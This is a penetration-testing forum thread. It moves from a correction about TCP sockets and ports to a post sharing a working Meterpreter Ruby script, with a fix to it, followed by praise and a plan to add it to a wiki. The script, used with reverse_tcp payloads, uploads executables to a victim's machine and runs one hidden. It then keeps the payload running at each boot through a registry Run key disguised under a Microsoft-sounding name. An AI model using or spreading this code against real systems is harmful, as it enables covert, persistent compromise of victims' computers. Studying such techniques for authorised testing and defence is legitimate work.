Pentesting Documentation

[lupin]

I like the pictures. Funny. Is that a monkey head on the client?


I don't know much about Java sockets, not being a Java programmer, but the description on that page about sockets does not describe the way sockets are normally created over TCP, for example between a web server and client.

An example:

A web server listens on TCP port 80.

A client, wanting to make a request to the server, picks a local client TCP port number (say 1198) and sends a TCP segment with the SYN flag set from that source port to the webserver on destination port 80. (So the client port is chosen by the client before its first communication)

The server responds with a TCP segment to destination port 1198 source port 80 with the SYN and ACK flags set. The client the sends a segment with an ACK flag set from TCP source port 1198 and TCP destination port 80. The three way handshake is now complete and the systems have a socket to communicate over, using the given ports.

Neither the server or the client will change their port numbers during this conversation, all communication in this socket goes between TCP ports 1198 and 80. The combination of the two IP addresses and two TCP port numbers from the server and client can uniquely identify the socket, to keep it separate from other sockets running over port 80 on the same web server. The server or client can use that socket to create new sockets for communication (like the Unix portmapper, FTP servers, etc), but TCP itself does not require it, and most client/server applications just use regular TCP sockets as described above.

You can confirm this by performing a packet capture between a web server and client.

Its possible that the link you provided meant something else by the word "port", but in terms or TCP ports (and UDP ports as well by the way), its not correct.

[AnActivist]

Shoot how embarrassing. Well, I found this quote from the website, perhaps you are correct that the below example is java specific?

The Java environment is highly regarded in part because of its suitability for writing programs that use and interact with the resources on the Internet and the World Wide Web. In fact, Java-capable browsers use this ability of the Java environment to the extreme to transport and run applets over the net.

Edit: I'm reading up on sockets over TCP so I'll be back with some more accurate information, and perhaps better pictures

[freemymind]

Well done and thank you for posting and sharing. I enjoyed following the post.
Looking forward to more.

[lupin]

so I'll be back with some more accurate information, and perhaps better pictures

OK, but keep the monkey head, it gives the pictures character

[AnActivist]

A while ago BigMac uploaded a very interesting video where he uses windows/meterpreter/reverse_tcp payloads that have been converted into executables along with a nifty ruby script to produce some very interesting results. To make a long story short a payload/executable is executed on the victims computer which then sends a meterpreter session back to the attacker but also executes this script:

Code:

print_status("Creating directory")
client.fs.dir.mkdir("c:\\system")
client.fs.dir.mkdir("c:\\system\\windows")
client.fs.file.upload_file("c:\\system\\windows\\wingrab.exe" , "/root/Desktop/Exploits/Project/wingrab.exe")
client.fs.file.upload_file("c:\\system\\windows\\winview.exe" , "/root/Desktop/Exploits/Project/winview.exe")
client.sys.process.execute("c:\\system\\windows\\wingrab.exe", nil, {'Hidden' => 'true'})

key = "HKLM\\software\\microsoft\\windows\\currentversion\\run"
value = "MicrosoftETA"
data = "c:\\system\\windows\\wingrab.exe"
type = "REG_SZ"
root_key, base_key = client.sys.registry.splitkey(key)
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
open_key.set_value(value, client.sys.registry.type2str(type), data)
print_line("Successful")

Basically adding another payload/executable to the registry so every time the victim starts their computer this payload is executed. For some reason starting a couple of weeks ago the script started to cause the meterpreter sessions to get in the way of each other and now the script doesn't produce the right results anymore. HDM helped me fix this problem with only two lines of code, however a couple of days ago my BT3 vmware got corrupted and I lost all my data. Now I can't remember how HDM did it but I figured out a way to solve the problem a little bit less elegantly.
To keep from the meterpreter sessions from getting hung up and re running the above script just add the following lines to the beginning and end:
NOTE: Watch BigMac's video if any of this is confusing, or check out some other tutorials, this isn't really a how to, more like a contribution to other peoples work, that being said a lot of the file names/ directories could be different.

Code:

id = client.sys.process['wingrab.exe']
if (id == nil)
....code from above....
end

This should fix the problem. When I have more time I'm going to re write this post so that it makes a little bit more sense. I just thought I would throw it out there to see if anyone else is having this issue of the sessions getting hung up without my addition. Hope this helps someone. Thanks for reading.

*KMDave I'd like to try and recreate the above problem with someone else. PM me if you want to try it out.

[thorin]

I think others would appreciate what you've done here. Maybe it should be wiki'fied? http://backtrack.offensive-security.....php/Main_Page

Anyone else in agreement?

Personally I think the popularity of the thread is evidence enough but lets get some feedback. I don't want to make AnActivist do anymore work than the community is interested in.

[laffing_man]

Anyone else in agreement?

Personally I think the popularity of the thread is evidence enough but lets get some feedback. I don't want to make AnActivist do anymore work than the community is interested in.

100% agreed! Wiki this beast!

[Archangel-Amael]

Anyone else in agreement?

Personally I think the popularity of the thread is evidence enough but lets get some feedback. I don't want to make AnActivist do anymore work than the community is interested in.

I agree it should be on the wiki.

[lupin]

Anyone else in agreement?

Personally I think the popularity of the thread is evidence enough but lets get some feedback. I don't want to make AnActivist do anymore work than the community is interested in.

Sounds good to me, there's certainly some interesting and useful information here. I assume though that the process of transferring the content to the wiki would require some re-editing and re-formatting (from "post" format to "wiki" format), and pruning of off-topic posts (e.g. the whole ethics discussion), which Im guessing would need to be done by AnActivist, so lets hear what he has to say on the matter.

AnActivist?

[AnActivist]

Because of a PM from thorin a couple weeks ago I said that if there was interest I would absolutely post the information I have accumulated to the wiki. I'm honored to give back to the community. I'll get started figuring out how to add the reformatted HowTo's to the wiki right away. Thank you everyone for the recognition.